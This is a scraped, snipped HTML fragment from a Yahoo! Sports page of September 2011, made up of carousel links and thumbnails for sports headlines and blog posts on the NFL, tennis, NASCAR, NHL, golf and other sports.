<a href="http://sports.yahoo.com/nascar/news?slug=ap-nascar-atlanta&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NASCAR hopes bad weather gone by Tuesday">
<img src="http://l.yimg.com/iu/api/res/1.2/fY0ArNmEgARdXgW3VFOLkw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/crash1.jpg" title="NASCAR hopes bad weather gone by Tuesday" alt="NASCAR hopes bad weather gone by Tuesday" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=txnascarnationwide&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Edwards recovers, wins">
<img src="http://l.yimg.com/iu/api/res/1.2/KLKYfKOxh3ZdcnMCT15hfw--/YXBwaWQ9eXZpZGVvO2NoPTQyNTtjcj0xO2N3PTYzNDtkeD0xNDtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/getty/b1/fullj.74236e574d6a4f7fa42887a424e4ecaf/74236e574d6a4f7fa42887a424e4ecaf-getty-107745401js007_11th_annual_.jpg" title="Edwards recovers, wins" alt="Edwards recovers, wins" width="94" height="63">
</a>
...[SNIP]...
post/Rafael-Nadal-collapses-at-post-match-press-confe?urn=ten-wp2948&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rafael Nadal collapses at post-match press conference">
<img src="http://l.yimg.com/iu/api/res/1.2/p8QNXBH2ur9RxK3SSsdbug--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/nadal.jpg" title="Rafael Nadal collapses at post-match press conference" alt="Rafael Nadal collapses at post-match press conference" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_venuswilliams_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Venus thanks fans">
<img src="http://l.yimg.com/iu/api/res/1.2/SGDXAA_VYFh5N_Ix_DfK.g--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.e6fc1b4cfaefc628237dd6812cc3d4a6/0.jpg" title="Venus thanks fans" alt="Venus thanks fans" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_men_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Nadal in field of 16">
<img src="http://l.yimg.com/iu/api/res/1.2/rk8mzTCWVKirKboIUyXTDg--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.d830959be5676770fcf36656ad0b01f5/0.jpg" title="Nadal in field of 16" alt="Nadal in field of 16" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-roddick&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Roddick looks strong">
<img src="http://l.yimg.com/iu/api/res/1.2/hTuM.plFCT5s1M65gp6zww--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314857213.jpg" title="Roddick looks strong" alt="Roddick looks strong" width="94" height="63">
</a>
...[SNIP]...
log/shutdown_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110904_nfc_free_agent_moves_by_team_2&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Free agent moves">
<img src="http://l.yimg.com/iu/api/res/1.2/DO19w.oidtwvdIr1uvR..w--/YXBwaWQ9eXZpZGVvO2NoPTIzMDtjcj0xO2N3PTM0MztkeD0zOTtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/pfw/72/fullj.d31be56e39031f27aa6903d7c8ccdb0b/20110904_nfc_free_agent_moves_0.jpg" title="Free agent moves" alt="Free agent moves" width="94" height="63">
</a>
...[SNIP]...
ttp://sports.yahoo.com/nfl/news?slug=nfp-20110904_mark_herzlich_beats_the_odds_makes_giants_roster&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Herzlich beats the odds">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-leeroyselmon&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Selmon is improving">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds-semenya&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="South African runner's valiant return">
<img src="http://l.yimg.com/iu/api/res/1.2/1J1FJn2FsGUNJqTveVRpJQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/semenya.jpg" title="South African runner's valiant return" alt="South African runner's valiant return" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Bolt, Jamaica take gold">
<img src="http://l.yimg.com/iu/api/res/1.2/97klez0UFQMbKD7UV7d0.Q--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/e5/fullj.7d1639ed4877ae02a0cee5b1991a05fe/ap-201109020839311726658.jpg" title="Bolt, Jamaica take gold" alt="Bolt, Jamaica take gold" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/olympics/news?slug=ap-2020bids&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Six bid for 2020 Olympics">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=reu-worldmentriple_jump_pix&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="American pulls upset">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/blog/big_league_stew/post/Wedgie-Foul-ball-sticks-in-mask-of-Mariners-cat?urn=mlb-wp18471&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Foul ball's funny landing place">
<img src="http://l.yimg.com/iu/api/res/1.2/L_C_0HS.bC_7fqRT3udDuw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/stuck.jpg" title="Foul ball's funny landing place" alt="Foul ball's funny landing place" width="94" height="63">
</a>
...[SNIP]...
ost/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down-Corner-Week-1-Preview-Podcast-Greg?urn=nfl-wp6458&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Week 1 Preview Podcast: Greg Cosell">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Colts delay Tressel...s employment until seventh week of regular season">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Colts delay Tressel...s employment until seventh week of regular season" alt="Colts delay Tressel...s employment until seventh week of regular season" width="94" height="63">
</a>
...[SNIP]...
it-looks-like-Manning-8217-s-str?urn=nfl-wp6439&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="More and more, it looks like Manning...s streak is in jeopardy">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aneers-Hall-of-Famer-Lee-Roy-Selmo?urn=nfl-wp6433&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Tampa Bay Buccaneers Hall of Famer Lee Roy Selmon dies at 56">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
log/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
rudge-might-8216?urn=nfl-wp6399&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Troy Aikman still carries a grudge, might ...get physical... with Skip Bayless">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-mean-more-to-Packers-LB-Vic-So-?urn=nfl-wp6392&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Preseason could mean more to Packers LB Vic So...oto than most">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
wn_corner/post/The-Shutdown-Corner-Podcast-Mike-Silver?urn=nfl-wp6388&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Mike Silver">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
back-8?urn=nfl-wp6382&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Haynesworth would ...give that money back... to have played for Pats instead of Redskins">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/Colts-hire-Jim-Tressel-as-8216-gameday-consult?urn=nfl-wp6368&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Ousted Ohio State coach lands NFL job">
<img src="http://l.yimg.com/iu/api/res/1.2/h_zLXLqXGLxqtLROuGO0hQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/tressel.jpg" title="Ousted Ohio State coach lands NFL job" alt="Ousted Ohio State coach lands NFL job" width="94" height="63">
</a>
...[SNIP]...
corner/post/Video-Theismann-windily-calls-out-Redskins-retur?urn=nfl-wp6337&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="'Stupid' play infuriates announcer">
<img src="http://l.yimg.com/iu/api/res/1.2/CFHAgrHng88MCICCWPs.Ag--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/banks-pd.jpg" title="'Stupid' play infuriates announcer" alt="'Stupid' play infuriates announcer" width="94" height="63">
</a>
...[SNIP]...
-has-an-art-gallery-and-somebody-br?urn=nfl-wp6331&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Chris Cooley has an art gallery, and somebody broke into it">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/A-week-before-the-season-Lance-Briggs-asks-to-b?urn=nfl-wp6329&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL player's poorly timed request">
<img src="http://l.yimg.com/iu/api/res/1.2/4SGMPg8hKSC75E289QQ3XQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/briggs.jpg" title="NFL player's poorly timed request" alt="NFL player's poorly timed request" width="94" height="63">
</a>
...[SNIP]...
/shutdown_corner/post/Newton-causes-Bo-Jackson-to-wax-rhapsodic-gets-?urn=nfl-wp6323&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Bo Jackson praises rookie">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Dez-Bryant-is-now-living-life-on-the-straight-an?urn=nfl-wp6320&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Dez Bryant's turnaround">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ccaneerss-WR-Mike-Williams-guarantees-playoffs?urn=nfl-wp6314&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Buccaneerss WR Mike Williams guarantees playoffs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down_corner/post/The-Shutdown-Corner-Podcast-Rich-Eisen?urn=nfl-wp6310&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Rich Eisen">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
yan-compares-Michele-Bachmann-to-Terrell-?urn=nfl-wp6302&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Jon Runyan compares Michele Bachmann to Terrell Owens">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
r/post/And-now-an-MRI-of-Braylon-Edwards-8217-hands?urn=nfl-wp6294&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="And now, an MRI of Braylon Edwards... hands">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/Jerry-Jones-might-have-talked-himself-out-of-a-b?urn=nfl-wp6283&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL owner's joke could be costly">
<img src="http://l.yimg.com/iu/api/res/1.2/znW.5ZhfWEz4FHFcKOfAlA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/us/i/ww/news/2011/09/01/jones.jpg" title="NFL owner's joke could be costly" alt="NFL owner's joke could be costly" width="94" height="63">
</a>
...[SNIP]...
sville-guard-Edgar-Sosa-suffers-gruesome-?urn=ncaab-wp4622&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Ex-Louisville guard Edgar Sosa suffers gruesome broken leg">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-departure-extends-Wake-Fore?urn=ncaab-wp4618&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="J.T. Terrell...s departure extends Wake Forest...s run of bad luck">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
of-Vancouver-blames-NHL-for-riots-embarras?urn=nhl-wp11913&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="City of Vancouver blames NHL for riots, embarrasses itself">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Wozniacki-lacks-many-things-fight-is-n?urn=ten-wp2976&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Caroline Wozniacki lacks many things, fight is not one of them">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
usted_racquet/post/U-S-Open-women-8217-s-quarterfinal-preview?urn=ten-wp2965&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="U.S. Open women...s quarterfinal preview">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ideo-Witness-Andrew-Ference-8217-s-Stanley-Cu?urn=nhl-wp11900&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Witness Andrew Ference...s Stanley Cup flash mob">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ers-GM-Holmgren-injured-in-8216-ser?urn=nhl-wp11901&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Report: Flyers GM Holmgren injured in ...serious... bike accident">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-new-helmets-are-even-m?urn=ncaaf-wp5948&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Maryland...s new helmets are even more Maryland-y than we thought">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oto-of-the-day-Jo-Wilfriend-Tsonga-eats-a-ten?urn=ten-wp2972&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Photo of the day: Jo-Wilfriend Tsonga eats a tennis ball">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-temper-costs-him-two-shots-a?urn=golf-wp5410&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Nick Watney...s temper costs him two shots as he cards 11 on par-5">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Tsonga-on-court-during-argument-abo?urn=ten-wp2967&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Fish insults Tsonga on court during argument about player...s box">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
w-Keary-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
st/Breaking-news-American-golf-is-not-dead-after-a?urn=golf-wp5406&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Breaking news: American golf is not dead after all">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
The-Longest-Game-for-Cystic-Fibrosis-is-in-the-b?urn=nhl-wp11877&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Longest Game for Cystic Fibrosis is in the books">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
cos-are-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/FedEx-Cupdate-Who-8217-s-headed-to-Chicago-for?urn=golf-wp5396&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="FedEx Cupdate: Who...s headed to Chicago for the BMW?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
day-Boise-State-uncovers-Georgia-?urn=ncaaf-wp5937&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Mid-Major Monday: Boise State uncovers Georgia...s pressure points">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
he-Ryan-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-coach-takes-mystery-flatulence-as-sign-?urn=sow-wp4670&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Flamengo coach takes mystery flatulence as sign of disrespect">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
Daddy-NHL-Season-Preview-2011-12-Carolina-?urn=nhl-wp11870&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Daddy NHL Season Preview 2011-12: Carolina Hurricanes">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
or-Day-Marvin-Miller-Joe-Niekro-Nola?urn=mlb-wp18621&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Happy Labor Day! Marvin Miller, Joe Niekro, Nolan Ryan talk shop">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aling-ahem-look-inside-KHL-cheerlea?urn=nhl-wp11867&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Revealing, ahem, look inside KHL cheerleader dressing room">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-that-Malbranque-retires-to-care-fo?urn=sow-wp4665&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Media reports that Malbranque retires to care for non-existent son">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ey-8217-s-tough-guys-need-their-own-repr?urn=nhl-wp11832&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Do hockey...s tough guys need their own representative body?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
eadlines-NHL-mental-health-debate-hockey?urn=nhl-wp11861&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Headlines: NHL mental health debate; hockey wedding vid">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://add.my.yahoo.com/rss?url=http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif" alt="Add to My Yahoo!" width="91" height="17" border="0"></a>
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/ext/rss4.gif" alt="RSS" width="17" height="17" border="0"></a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" title="Tiki Barber remains unemployed and sad"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315235529.jpg" class="thumb" /></a>
...[SNIP]...
